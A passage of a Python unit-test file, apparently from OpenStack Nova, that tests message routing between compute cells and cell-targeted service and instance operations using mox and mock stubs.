self.assertEqual(method_kwargs, call_info['kwargs'])
self.assertEqual(target_cell, call_info['routing_path'])
def test_grandchild_targeted_message_with_response(self):
target_cell = 'api-cell!child-cell2!grandchild-cell1'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
call_info = {}
def our_fake_method(message, **kwargs):
call_info['context'] = message.ctxt
call_info['routing_path'] = message.routing_path
call_info['kwargs'] = kwargs
return 'our_fake_response'
fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell,
need_response=True)
response = tgt_message.process()
self.assertEqual(self.ctxt, call_info['context'])
self.assertEqual(method_kwargs, call_info['kwargs'])
self.assertEqual(target_cell, call_info['routing_path'])
self.assertFalse(response.failure)
self.assertEqual('our_fake_response', response.value_or_raise())
def test_grandchild_targeted_message_with_error(self):
target_cell = 'api-cell!child-cell2!grandchild-cell1'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
def our_fake_method(message, **kwargs):
raise test.TestingException('this should be returned')
fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell,
need_response=True)
response = tgt_message.process()
self.assertTrue(response.failure)
self.assertRaises(test.TestingException, response.value_or_raise)
def test_grandchild_targeted_message_max_hops(self):
self.flags(max_hop_count=2, group='cells')
target_cell = 'api-cell!child-cell2!grandchild-cell1'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
def our_fake_method(message, **kwargs):
raise test.TestingException('should not be reached')
fakes.stub_tgt_method(self, 'grandchild-cell1', 'our_fake_method',
our_fake_method)
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell,
need_response=True)
response = tgt_message.process()
self.assertTrue(response.failure)
self.assertRaises(exception.CellMaxHopCountReached,
response.value_or_raise)
def test_targeted_message_invalid_cell(self):
target_cell = 'api-cell!child-cell2!grandchild-cell4'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell,
need_response=True)
response = tgt_message.process()
self.assertTrue(response.failure)
self.assertRaises(exception.CellRoutingInconsistency,
response.value_or_raise)
def test_targeted_message_invalid_cell2(self):
target_cell = 'unknown-cell!child-cell2'
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
tgt_message = messaging._TargetedMessage(self.msg_runner,
self.ctxt, method,
method_kwargs, direction,
target_cell,
need_response=True)
response = tgt_message.process()
self.assertTrue(response.failure)
self.assertRaises(exception.CellRoutingInconsistency,
response.value_or_raise)
def test_targeted_message_target_cell_none(self):
target_cell = None
method = 'our_fake_method'
method_kwargs = dict(arg=1, arg2=2)
direction = 'down'
self.assertRaises(exception.CellRoutingInconsistency,
messaging._TargetedMessage, self.msg_runner, self.ctxt, method,
method_kwargs, direction, target_cell, need_response=False)
def test_broadcast_routing(self):
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
cells = set()
def our_fake_method(message, **kwargs):
cells.add(message.routing_path)
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs,
direction,
run_locally=True)
bcast_message.process()
# fakes creates 8 cells (including ourself).
self.assertEqual(8, len(cells))
def test_broadcast_routing_up(self):
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'up'
msg_runner = fakes.get_message_runner('grandchild-cell3')
cells = set()
def our_fake_method(message, **kwargs):
cells.add(message.routing_path)
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
bcast_message = messaging._BroadcastMessage(msg_runner, self.ctxt,
method, method_kwargs,
direction,
run_locally=True)
bcast_message.process()
# Paths are reversed, since going 'up'
expected = set(['grandchild-cell3', 'grandchild-cell3!child-cell3',
'grandchild-cell3!child-cell3!api-cell'])
self.assertEqual(expected, cells)
def test_broadcast_routing_without_ourselves(self):
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
cells = set()
def our_fake_method(message, **kwargs):
cells.add(message.routing_path)
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs,
direction,
run_locally=False)
bcast_message.process()
# fakes creates 8 cells (including ourself). So we should see
# only 7 here.
self.assertEqual(7, len(cells))
def test_broadcast_routing_with_response(self):
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
def our_fake_method(message, **kwargs):
return 'response-%s' % message.routing_path
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs,
direction,
run_locally=True,
need_response=True)
responses = bcast_message.process()
self.assertEqual(8, len(responses))
for response in responses:
self.assertFalse(response.failure)
self.assertEqual('response-%s' % response.cell_name,
response.value_or_raise())
def test_broadcast_routing_with_response_max_hops(self):
self.flags(max_hop_count=2, group='cells')
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
def our_fake_method(message, **kwargs):
return 'response-%s' % message.routing_path
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs,
direction,
run_locally=True,
need_response=True)
responses = bcast_message.process()
# Should only get responses from our immediate children (and
# ourselves)
self.assertEqual(5, len(responses))
for response in responses:
self.assertFalse(response.failure)
self.assertEqual('response-%s' % response.cell_name,
response.value_or_raise())
def test_broadcast_routing_with_all_erroring(self):
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
def our_fake_method(message, **kwargs):
raise test.TestingException('fake failure')
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs,
direction,
run_locally=True,
need_response=True)
responses = bcast_message.process()
self.assertEqual(8, len(responses))
for response in responses:
self.assertTrue(response.failure)
self.assertRaises(test.TestingException, response.value_or_raise)
def test_broadcast_routing_with_two_erroring(self):
method = 'our_fake_method'
method_kwargs = dict(arg1=1, arg2=2)
direction = 'down'
def our_fake_method_failing(message, **kwargs):
raise test.TestingException('fake failure')
def our_fake_method(message, **kwargs):
return 'response-%s' % message.routing_path
fakes.stub_bcast_methods(self, 'our_fake_method', our_fake_method)
fakes.stub_bcast_method(self, 'child-cell2', 'our_fake_method',
our_fake_method_failing)
fakes.stub_bcast_method(self, 'grandchild-cell3', 'our_fake_method',
our_fake_method_failing)
bcast_message = messaging._BroadcastMessage(self.msg_runner,
self.ctxt, method,
method_kwargs,
direction,
run_locally=True,
need_response=True)
responses = bcast_message.process()
self.assertEqual(8, len(responses))
failure_responses = [resp for resp in responses if resp.failure]
success_responses = [resp for resp in responses if not resp.failure]
self.assertEqual(2, len(failure_responses))
self.assertEqual(6, len(success_responses))
for response in success_responses:
self.assertFalse(response.failure)
self.assertEqual('response-%s' % response.cell_name,
response.value_or_raise())
for response in failure_responses:
self.assertIn(response.cell_name, ['api-cell!child-cell2',
'api-cell!child-cell3!grandchild-cell3'])
self.assertTrue(response.failure)
self.assertRaises(test.TestingException, response.value_or_raise)
class CellsTargetedMethodsWithDatabaseTestCase(test.TestCase):
"""These tests access the database unlike the others."""
def setUp(self):
super(CellsTargetedMethodsWithDatabaseTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self._setup_attrs('api-cell', 'api-cell!child-cell2')
def _setup_attrs(self, source_cell, target_cell):
self.tgt_cell_name = target_cell
self.src_msg_runner = fakes.get_message_runner(source_cell)
def test_service_delete(self):
fake_service = dict(id=42, host='fake_host', binary='nova-compute',
topic='compute')
ctxt = self.ctxt.elevated()
db.service_create(ctxt, fake_service)
self.src_msg_runner.service_delete(
ctxt, self.tgt_cell_name, fake_service['id'])
self.assertRaises(exception.ServiceNotFound,
db.service_get, ctxt, fake_service['id'])
class CellsTargetedMethodsTestCase(test.NoDBTestCase):
"""Test case for _TargetedMessageMethods class. Most of these
tests actually test the full path from the MessageRunner through
to the functionality of the message method. Hits 2 birds with 1
stone, even though it's a little more than a unit test.
"""
def setUp(self):
super(CellsTargetedMethodsTestCase, self).setUp()
fakes.init(self)
self.ctxt = context.RequestContext('fake', 'fake')
self._setup_attrs('api-cell', 'api-cell!child-cell2')
def _setup_attrs(self, source_cell, target_cell):
self.tgt_cell_name = target_cell
self.src_msg_runner = fakes.get_message_runner(source_cell)
self.src_state_manager = self.src_msg_runner.state_manager
tgt_shortname = target_cell.split('!')[-1]
self.tgt_cell_mgr = fakes.get_cells_manager(tgt_shortname)
self.tgt_msg_runner = self.tgt_cell_mgr.msg_runner
self.tgt_scheduler = self.tgt_msg_runner.scheduler
self.tgt_state_manager = self.tgt_msg_runner.state_manager
methods_cls = self.tgt_msg_runner.methods_by_type['targeted']
self.tgt_methods_cls = methods_cls
self.tgt_compute_api = methods_cls.compute_api
self.tgt_host_api = methods_cls.host_api
self.tgt_db_inst = methods_cls.db
self.tgt_c_rpcapi = methods_cls.compute_rpcapi
def test_build_instances(self):
build_inst_kwargs = {'filter_properties': {},
'key1': 'value1',
'key2': 'value2'}
self.mox.StubOutWithMock(self.tgt_scheduler, 'build_instances')
self.tgt_scheduler.build_instances(self.ctxt, build_inst_kwargs)
self.mox.ReplayAll()
self.src_msg_runner.build_instances(self.ctxt, self.tgt_cell_name,
build_inst_kwargs)
def _run_compute_api_method(self, method_name):
instance = fake_instance.fake_instance_obj(self.ctxt)
method_info = {'method': method_name,
'method_args': (instance.uuid, 2, 3),
'method_kwargs': {'arg1': 'val1', 'arg2': 'val2'}}
expected_attrs = ['metadata', 'system_metadata', 'security_groups',
'info_cache']
@mock.patch.object(self.tgt_compute_api, method_name,
return_value='fake-result')
@mock.patch.object(objects.Instance, 'get_by_uuid',
return_value=instance)
def run_method(mock_get_by_uuid, mock_method):
response = self.src_msg_runner.run_compute_api_method(
self.ctxt,
self.tgt_cell_name,
method_info,
True)
result = response.value_or_raise()
self.assertEqual('fake-result', result)
mock_get_by_uuid.assert_called_once_with(self.ctxt, instance.uuid,
expected_attrs=expected_attrs)
mock_method.assert_called_once_with(self.ctxt, instance, 2, 3,
arg1='val1', arg2='val2')
run_method()
def test_run_compute_api_method_expects_obj(self):
# Run compute_api start method
self._run_compute_api_method('start')
def test_run_compute_api_method_shelve_with_info_cache(self):
# Run compute_api shelve method as it requires info_cache and
# metadata to be present in instance object
self._run_compute_api_method('shelve')
def test_run_compute_api_method_unknown_instance(self):
# Unknown instance should send a broadcast up that instance
# is gone.
instance = fake_instance.fake_instance_obj(self.ctxt)
instance_uuid = instance.uuid
method_info = {'method': 'reboot',
'method_args': (instance_uuid, 2, 3),
'method_kwargs': {'arg1': 'val1', 'arg2': 'val2'}}
self.mox.StubOutWithMock(objects.Instance, 'get_by_uuid')
self.mox.StubOutWithMock(self.tgt_msg_runner,
'instance_destroy_at_top')
objects.Instance.get_by_uuid(self.ctxt, instance.uuid,
expected_attrs=['metadata', 'system_metadata',
'security_groups', 'info_cache']).AndRaise(
exception.InstanceNotFound(instance_id=instance_uuid))
self.tgt_msg_runner.instance_destroy_at_top(self.ctxt,
mox.IsA(objects.Instance))
self.mox.ReplayAll()
response = self.src_msg_runner.run_compute_api_method(
self.ctxt,
self.tgt_cell_name,
method_info,
True)
self.assertRaises(exception.InstanceNotFound,
response.value_or_raise)
def test_update_capabilities(self):
# Route up to API
self._setup_attrs('child-cell2', 'child-cell2!api-cell')
capabs = {'cap1': set(['val1', 'val2']),
'cap2': set(['val3'])}
# The list(set([])) seems silly, but we can't assume the order
# of the list... This behavior should match the code we're
# testing... which is check that a set was converted to a list.
expected_capabs = {'cap1': list(set(['val1', 'val2'])),
'cap2': ['val3']}
self.mox.StubOutWithMock(self.src_state_manager,
'get_our_capabilities')
self.mox.StubOutWithMock(self.tgt_state_manager,
'update_cell_capabilities')
self.mox.StubOutWithMock(self.tgt_msg_runner,
'tell_parents_our_capabilities')
self.src_state_manager.get_our_capabilities().AndReturn(capabs)
self.tgt_state_manager.update_cell_capabilities('child-cell2',
expected_capabs)
self.tgt_msg_runner.tell_parents_our_capabilities(self.ctxt)
self.mox.ReplayAll()
self.src_msg_runner.tell_parents_our_capabilities(self.ctxt)
def test_update_capacities(self):
self._setup_attrs('child-cell2', 'child-cell2!api-cell')
capacs = 'fake_capacs'
self.mox.StubOutWithMock(self.src_state_manager,
'get_our_capacities')
self.mox.StubOutWithMock(self.tgt_state_manager,
'update_cell_capacities')
self.mox.StubOutWithMock(self.tgt_msg_runner,
'tell_parents_our_capacities')
self.src_state_manager.get_our_capacities().AndReturn(capacs)
self.tgt_state_manager.update_cell_capacities('child-cell2',
capacs)
self.tgt_msg_runner.tell_parents_our_capacities(self.ctxt)
self.mox.ReplayAll()
self.src_msg_runner.tell_parents_our_capacities(self.ctxt)
def test_announce_capabilities(self):
self._setup_attrs('api-cell', 'api-cell!child-cell1')
# To make this easier to test, make us only have 1 child cell.
cell_state = self.src_state_manager.child_cells['child-cell1']
self.src_state_manager.child_cells = {'child-cell1': cell_state}
self.mox.StubOutWithMock(self.tgt_msg_runner,
'tell_parents_our_capabilities')
self.tgt_msg_runner.tell_parents_our_capabilities(self.ctxt)
self.mox.ReplayAll()
self.src_msg_runner.ask_children_for_capabilities(self.ctxt)
def test_announce_capacities(self):
self._setup_attrs('api-cell', 'api-cell!child-cell1')
# To make this easier to test, make us only have 1 child cell.
cell_state = self.src_state_manager.child_cells['child-cell1']
self.src_state_manager.child_cells = {'child-cell1': cell_state}
self.mox.StubOutWithMock(self.tgt_msg_runner,
'tell_parents_our_capacities')
self.tgt_msg_runner.tell_parents_our_capacities(self.ctxt)
self.mox.ReplayAll()
self.src_msg_runner.ask_children_for_capacities(self.ctxt)
def test_service_get_by_compute_host(self):
fake_host_name = 'fake-host-name'
self.mox.StubOutWithMock(objects.Service, 'get_by_compute_host')
objects.Service.get_by_compute_host(self.ctxt,
fake_host_name).AndReturn('fake-service')
self.mox.ReplayAll()
response = self.src_msg_runner.service_get_by_compute_host(
self.ctxt,
self.tgt_cell_name,
fake_host_name)
result = response.value_or_raise()
self.assertEqual('fake-service', result)
def test_service_update(self):
binary = 'nova-compute'
params_to_update = {'disabled': True, 'report_count': 13}
fake_service = objects.Service(id=42, host='fake_host',
binary='nova-compute',
topic='compute')
fake_service.compute_node = objects.ComputeNode(id=1, host='fake_host')
self.mox.StubOutWithMock(objects.Service, 'get_by_args')
self.mox.StubOutWithMock(objects.Service, 'save')
objects.Service.get_by_args(
self.ctxt, 'fake_host', 'nova-compute').AndReturn(fake_service)
fake_service.save()
self.mox.ReplayAll()
response = self.src_msg_runner.service_update(
self.ctxt, self.tgt_cell_name,
'fake_host', binary, params_to_update)
result = response.value_or_raise()
self.assertIsInstance(result, objects.Service)
self.assertTrue(objects_base.obj_equal_prims(fake_service, result))
def test_proxy_rpc_to_manager_call(self):
fake_topic = 'fake-topic'
fake_rpc_message = {'method': 'fake_rpc_method', 'args': {}}
fake_host_name = 'fake-host-name'
self.mox.StubOutWithMock(objects.Service, 'get_by_compute_host')
objects.Service.get_by_compute_host(self.ctxt, fake_host_name)
target = oslo_messaging.Target(topic='fake-topic')
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpc, 'get_client')
rpc.get_client(target).AndReturn(rpcclient)
rpcclient.prepare(timeout=5).AndReturn(rpcclient)
rpcclient.call(mox.IgnoreArg(),
'fake_rpc_method').AndReturn('fake_result')
self.mox.ReplayAll()
response = self.src_msg_runner.proxy_rpc_to_manager(
self.ctxt,
self.tgt_cell_name,
fake_host_name,
fake_topic,
fake_rpc_message, True, timeout=5)
result = response.value_or_raise()
self.assertEqual('fake_result', result)
def test_proxy_rpc_to_manager_cast(self):
fake_topic = 'fake-topic'
fake_rpc_message = {'method': 'fake_rpc_method', 'args': {}}
fake_host_name = 'fake-host-name'
self.mox.StubOutWithMock(objects.Service, 'get_by_compute_host')
objects.Service.get_by_compute_host(self.ctxt, fake_host_name)
target = oslo_messaging.Target(topic='fake-topic')
rpcclient = self.mox.CreateMockAnything()
self.mox.StubOutWithMock(rpc, 'get_client')
rpc.get_client(target).AndReturn(rpcclient)
rpcclient.cast(mox.IgnoreArg(), 'fake_rpc_method')
self.mox.ReplayAll()
self.src_msg_runner.proxy_rpc_to_manager(
self.ctxt,
self.tgt_cell_name,
fake_host_name,
fake_topic,
fake_rpc_message, False, timeout=None)
def test_task_log_get_all_targeted(self):
task_name = 'fake_task_name'
begin = 'fake_begin'
end = 'fake_end'
host = 'fake_host'
state = 'fake_state'
self.mox.StubOutWithMock(self.tgt_db_inst, 'task_log_get_all')
self.tgt_db_inst.task_log_get_all(self.ctxt, task_name,
begin, end, host=host,
state=state).AndReturn(['fake_result'])
self.mox.ReplayAll()
response = self.src_msg_runner.task_log_get_all(self.ctxt,
self.tgt_cell_name, task_name, begin, end, host=host,
state=state)
self.assertIsInstance(response, list)
self.assertEqual(1, len(response))
result = response[0].value_or_raise()
self.assertEqual(['fake_result'], result)
def test_compute_node_get(self):
compute_id = 'fake-id'
self.mox.StubOutWithMock(objects.ComputeNode, 'get_by_id')
objects.ComputeNode.get_by_id(self.ctxt,
compute_id).AndReturn('fake_result')
self.mox.ReplayAll()
response = self.src_msg_runner.compute_node_get(self.ctxt,
self.tgt_cell_name, compute_id)
result = response.value_or_raise()
self.assertEqual('fake_result', result)
def test_actions_get(self):
fake_uuid = fake_server_actions.FAKE_UUID
fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
self.mox.StubOutWithMock(self.tgt_db_inst, 'actions_get')
self.tgt_db_inst.actions_get(self.ctxt,
'fake-uuid').AndReturn([fake_act])
self.mox.ReplayAll()
response = self.src_msg_runner.actions_get(self.ctxt,
self.tgt_cell_name,
'fake-uuid')
result = response.value_or_raise()
self.assertEqual([jsonutils.to_primitive(fake_act)], result)
def test_action_get_by_request_id(self):
fake_uuid = fake_server_actions.FAKE_UUID
fake_req_id = fake_server_actions.FAKE_REQUEST_ID1
fake_act = fake_server_actions.FAKE_ACTIONS[fake_uuid][fake_req_id]
self.mox.StubOutWithMock(self.tgt_db_inst, 'action_get_by_request_id')
self.tgt_db_inst.action_get_by_request_id(self.ctxt,
'fake-uuid', 'req-fake').AndReturn(fake_act)
self.mox.ReplayAll()
response = self.src_msg_runner.action_get_by_request_id(self.ctxt,
self.tgt_cell_name, 'fake-uuid', 'req-fake')
result = response.value_or_raise()
self.assertEqual(jsonutils.to_primitive(fake_act), result)
def test_action_events_get(self):
fake_action_id = fake_server_actions.FAKE_ACTION_ID1
fake_events = fake_server_actions.FAKE_EVENTS[fake_action_id]
self.mox.StubOutWithMock(self.tgt_db_inst, 'action_events_get')
self.tgt_db_inst.action_events_get(self.ctxt,
'fake-action').AndReturn(fake_events)
self.mox.ReplayAll()
response = self.src_msg_runner.action_events_get(self.ctxt,
self.tgt_cell_name,
'fake-action')
result = response.value_or_raise()
self.assertEqual(jsonutils.to_primitive(fake_events), result)
def test_validate_console_port(self):
instance_uuid = 'fake_instance_uuid'
instance = objects.Instance(uuid=instance_uuid)
console_port = 'fake-port'
console_type = 'fake-type'
@mock.patch.object(objects.Instance, 'get_by_uuid',
return_value=instance)
@mock.patch.object(self.tgt_c_rpcapi, 'validate_console_port',
return_value='fake_result')
def do_test(mock_validate, mock_get):
response = self.src_msg_runner.validate_console_port(self.ctxt,
self.tgt_cell_name, instance_uuid, console_port,
console_type)
result = response.value_or_raise()
self.assertEqual('fake_result', result)
mock_get.assert_called_once_with(self.ctxt, instance_uuid)
mock_validate.assert_called_once_with(self.ctxt, instance,
console_port, console_type)
do_test()
def test_get_migrations_for_a_given_cell(self):
filters = {'cell_name': 'child-cell2', 'status': 'confirmed'}
migrations_in_progress = [{'id': 123}]
self.mox.StubOutWithMock(self.tgt_compute_api,
'get_migrations')
self.tgt_compute_api.get_migrations(self.ctxt, filters).\
AndReturn(migrations_in_progress)
self.mox.ReplayAll()
responses = self.src_msg_runner.get_migrations(
self.ctxt,
self.tgt_cell_name, False, filters)
result = responses[0].value_or_raise()
self.assertEqual(migrations_in_progress, result)
def test_get_migrations_for_an_invalid_cell(self):
filters = {'cell_name': 'invalid_Cell', 'status': 'confirmed'}
responses = self.src_msg_runner.get_migrations(
self.ctxt,
'api_cell!invalid_cell', False, filters)
self.assertEqual(0, len(responses))
def test_call_compute_api_with_obj(self):
instance = objects.Instance()
instance.uuid = uuidutils.generate_uuid()
self.mox.StubOutWithMock(instance, 'refresh')
# Using 'snapshot' for this test, because it
# takes args and kwargs.
self.mox.StubOutWithMock(self.tgt_compute_api, 'snapshot')
instance.refresh()
self.tgt_compute_api.snapshot(
self.ctxt, instance, 'name',
extra_properties='props').AndReturn('foo')
self.mox.ReplayAll()
result = self.tgt_methods_cls._call_compute_api_with_obj(
self.ctxt, instance, 'snapshot', 'name',
extra_properties='props')
self.assertEqual('foo', result)
def test_call_compute_api_with_obj_no_cache(self):
instance = objects.Instance()
instance.uuid = uuidutils.generate_uuid()
error = exception.InstanceInfoCacheNotFound(
instance_uuid=instance.uuid)
with mock.patch.object(instance, 'refresh', side_effect=error):
self.assertRaises(exception.InstanceInfoCacheNotFound,
self.tgt_methods_cls._call_compute_api_with_obj,
self.ctxt, instance, 'snapshot')
def test_call_delete_compute_api_with_obj_no_cache(self):
instance = objects.Instance()
instance.uuid = uuidutils.generate_uuid()
error = exception.InstanceInfoCacheNotFound(
instance_uuid=instance.uuid)
with test.nested(
mock.patch.object(instance, 'refresh',
side_effect=error),
mock.patch.object(self.tgt_compute_api, 'delete')) as (inst,
delete):
self.tgt_methods_cls._call_compute_api_with_obj(self.ctxt,
instance,
'delete')
delete.assert_called_once_with(self.ctxt, instance)
def test_call_compute_with_obj_unknown_instance(self):
instance = objects.Instance()
instance.uuid = uuidutils.generate_uuid()
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
self.mox.StubOutWithMock(instance, 'refresh')
self.mox.StubOutWithMock(self.tgt_msg_runner,
'instance_destroy_at_top')
instance.refresh().AndRaise(
exception.InstanceNotFound(instance_id=instance.uuid))
self.tgt_msg_runner.instance_destroy_at_top(self.ctxt,
mox.IsA(objects.Instance))
self.mox.ReplayAll()
self.assertRaises(exception.InstanceNotFound,
self.tgt_methods_cls._call_compute_api_with_obj,
self.ctxt, instance, 'snapshot', 'name')
def _instance_update_helper(self, admin_state_reset):
class FakeMessage(object):
pass
message = FakeMessage()
message.ctxt = self.ctxt
instance = objects.Instance()
instance.cell_name = self.tgt_cell_name
instance.obj_reset_changes()
instance.task_state = 'meow'
instance.vm_state = 'wuff'
instance.user_data = 'foo'
instance.metadata = {'meta': 'data'}
instance.system_metadata = {'system': 'metadata'}
self.assertEqual(set(['user_data', 'vm_state', 'task_state',
'metadata', 'system_metadata']),
instance.obj_what_changed())
self.mox.StubOutWithMock(instance, 'save')
def _check_object(*args, **kwargs):
# task_state and vm_state changes should have been cleared
# before calling save()
if admin_state_reset:
self.assertEqual(
set(['user_data', 'vm_state', 'task_state']),
instance.obj_what_changed())
else:
self.assertEqual(set(['user_data']),
instance.obj_what_changed())
instance.save(expected_task_state='exp_task',
expected_vm_state='exp_vm').WithSideEffects(
_check_object)
self.mox.ReplayAll()
self.tgt_methods_cls.instance_update_from_api(
message,
instance,
expected_vm_state='exp_vm',
expected_task_state='exp_task',
admin_state_reset=admin_state_reset)
def test_instance_update_from_api(self):
self._instance_update_helper(False)
def test_instance_update_from_api_admin_state_reset(self):
self._instance_update_helper(True)
def test_instance_update_from_api_calls_skip_cells_sync(self):
self.flags(enable=True, cell_type='compute', group='cells')
instance = fake_instance.fake_instance_obj(self.ctxt)
instance.cell_name = self.tgt_cell_name
instance.task_state = 'meow'
instance.vm_state = 'wuff'
instance.user_data = 'foo'
message = ''
@mock.patch.object(instance, 'save', side_effect=test.TestingException)
@mock.patch.object(instance, 'skip_cells_sync')
def _ensure_skip_cells_sync_called(mock_sync, mock_save):
self.assertRaises(test.TestingException,
self.tgt_methods_cls.instance_update_from_api,
message, instance, expected_vm_state='exp_vm',
expected_task_state='exp_task', admin_state_reset=False)
mock_sync.assert_has_calls([mock.call()])
_ensure_skip_cells_sync_called()
self.assertEqual(self.tgt_cell_name, instance.cell_name)
@mock.patch.object(db, 'instance_update_and_get_original')
def test_instance_update_from_api_skips_cell_sync(self, mock_db_update):
self.flags(enable=True, cell_type='compute', group='cells')
instance = fake_instance.fake_instance_obj(self.ctxt)
instance.cell_name = self.tgt_cell_name
instance.task_state = 'meow'
instance.vm_state = 'wuff'
instance.user_data = 'foo'
message = ''
inst_ref = dict(objects_base.obj_to_primitive(instance))
mock_db_update.return_value = (inst_ref, inst_ref)
with mock.patch.object(cells_rpcapi.CellsAPI,
'instance_update_at_top') as inst_upd_at_top:
self.tgt_methods_cls.instance_update_from_api(message, instance,
expected_vm_state='exp_vm', expected_task_state='exp_task',
admin_state_reset=False)
self.assertEqual(0, inst_upd_at_top.call_count)
def _test_instance_action_method(self, method, args, kwargs,
expected_args, expected_kwargs,
expect_result):
class FakeMessage(object):
pass
message = FakeMessage()
message.ctxt = self.ctxt
message.need_response = expect_result
meth_cls = self.tgt_methods_cls
self.mox.StubOutWithMock(meth_cls, '_call_compute_api_with_obj')
method_corrections = {
'terminate': 'delete',
}
api_method = method_corrections.get(method, method)
meth_cls._call_compute_api_with_obj(
self.ctxt, 'fake-instance', api_method,
*expected_args, **expected_kwargs).AndReturn('meow')
self.mox.ReplayAll()
method_translations = {'revert_resize': 'revert_resize',
'confirm_resize': 'confirm_resize',
'reset_network': 'reset_network',
'inject_network_info': 'inject_network_info',
'set_admin_password': 'set_admin_password',
}
tgt_method = method_translations.get(method,
'%s_instance' % method)
result = getattr(meth_cls, tgt_method)(
message, 'fake-instance', *args, **kwargs)
if expect_result:
self.assertEqual('meow', result)
def test_start_instance(self):
self._test_instance_action_method('start', (), {}, (), {}, False)
def test_stop_instance_cast(self):
self._test_instance_action_method('stop', (), {}, (),
{'do_cast': True,
'clean_shutdown': True}, False)
def test_stop_instance_call(self):
self._test_instance_action_method('stop', (), {}, (),
{'do_cast': False,
'clean_shutdown': True}, True)
def test_reboot_instance(self):
kwargs = dict(reboot_type='HARD')
self._test_instance_action_method('reboot', (), kwargs, (),
kwargs, False)
def test_suspend_instance(self):
self._test_instance_action_method('suspend', (), {}, (), {}, False)
def test_resume_instance(self):
self._test_instance_action_method('resume', (), {}, (), {}, False)
def test_get_host_uptime(self):
host_name = "fake-host"
host_uptime = (" 08:32:11 up 93 days, 18:25, 12 users, load average:"
" 0.20, 0.12, 0.14")
self.mox.StubOutWithMock(self.tgt_host_api, 'get_host_uptime')
self.tgt_host_api.get_host_uptime(self.ctxt, host_name).\
AndReturn(host_uptime)
self.mox.ReplayAll()
response = self.src_msg_runner.get_host_uptime(self.ctxt,
self.tgt_cell_name,
host_name)
expected_host_uptime = response.value_or_raise()
self.assertEqual(host_uptime, expected_host_uptime)
def test_terminate_instance(self):
self._test_instance_action_method('terminate',
(), {}, (), {}, False)
def test_soft_delete_instance(self):
self._test_instance_action_method('soft_delete',
(), {}, (), {}, False)
def test_pause_instance(self):
self._test_instance_action_method('pause', (), {}, (), {}, False)
def test_unpause_instance(self):
self._test_instance_action_method('unpause', (), {}, (), {}, False)
def _test_resize_instance(self, clean_shutdown=True):
kwargs = dict(flavor=dict(id=42, flavorid='orangemocchafrappuccino'),
extra_instance_updates=dict(cow='moo'),
clean_shutdown=clean_shutdown)
expected_kwargs = dict(flavor_id='orangemocchafrappuccino', cow='moo',
clean_shutdown=clean_shutdown)
self._test_instance_action_method('resize', (), kwargs,
(), expected_kwargs,
False)
def test_resize_instance(self):
self._test_resize_instance()
def test_resize_instance_forced_shutdown(self):
self._test_resize_instance(clean_shutdown=False)
def test_live_migrate_instance(self):
kwargs = dict(block_migration='fake-block-mig',
disk_over_commit='fake-commit',
host_name='fake-host')
expected_args = ('fake-block-mig', 'fake-commit', 'fake-host')
self._test_instance_action_method('live_migrate', (), kwargs,
expected_args, {}, False)
def test_revert_resize(self):
self._test_instance_action_method('revert_resize',
(), {}, (), {}, False)
def test_confirm_resize(self):
self._test_instance_action_method('confirm_resize',
(), {}, (), {}, False)
def test_reset_network(self):
self._test_instance_action_method('reset_network',
(), {}, (), {}, False)
def test_inject_network_info(self):
self._test_instance_action_method('inject_network_info',
(), {}, (), {}, False)
def test_snapshot_instance(self):
inst = objects.Instance()
meth_cls = self.tgt_methods_cls
self.mox.StubOutWithMock(inst, 'refresh')
self.mox.StubOutWithMock(inst, 'save')
self.mox.StubOutWithMock(meth_cls.compute_rpcapi, 'snapshot_instance')
def check_state(expected_task_state=None):
self.assertEqual(task_states.IMAGE_SNAPSHOT_PENDING,
inst.task_state)
inst.refresh()
inst.save(expected_task_state=[None]).WithSideEffects(check_state)
meth_cls.compute_rpcapi.snapshot_instance(self.ctxt,
inst, 'image-id')
self.mox.ReplayAll()
class FakeMessage(object):
pass
message = FakeMessage()
message.ctxt = self.ctxt
message.need_response = False
meth_cls.snapshot_instance(message, inst, image_id='image-id')
def test_backup_instance(self):
inst = objects.Instance()
meth_cls = self.tgt_methods_cls
